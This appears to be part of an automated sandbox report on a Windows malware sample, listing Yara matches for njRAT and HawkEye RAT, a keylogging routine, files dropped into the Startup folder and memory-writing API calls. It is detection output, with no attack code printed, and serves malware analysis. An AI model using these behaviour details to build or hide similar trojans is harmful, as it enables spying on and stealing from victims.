Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Contains functionality to log keystrokes (.Net Source)

Show sources

Source: Tmp.exe.0.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: servieda.exe.1.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.2.pgr.exe.80000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 2.0.pgr.exe.80000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.cs	.Net Code: VKCodeToUnicode
Source: 3.2.servieda.exe.a0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 3.0.servieda.exe.a0000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.cs	.Net Code: VKCodeToUnicode

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 14_2_0040AC8A GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

14_2_0040AC8A

Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
Source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC5672 NtResumeThread,	13_2_02CC5672
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC55CA NtQuerySystemInformation,	13_2_02CC55CA
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC571A NtWriteVirtualMemory,	13_2_02CC571A
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC56ED NtWriteVirtualMemory,	13_2_02CC56ED
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC5590 NtQuerySystemInformation,	13_2_02CC5590

Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D0ADD	1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D36BD	1_2_00007FFD067D36BD
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Code function: 1_2_00007FFD067D1E55	1_2_00007FFD067D1E55
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Code function: 2_2_00A82238	2_2_00A82238
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E0ADD	3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E60AA	3_2_00007FFD067E60AA
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E36BD	3_2_00007FFD067E36BD
Source: C:\Users\user\AppData\Roaming\servieda.exe	Code function: 3_2_00007FFD067E620C	3_2_00007FFD067E620C
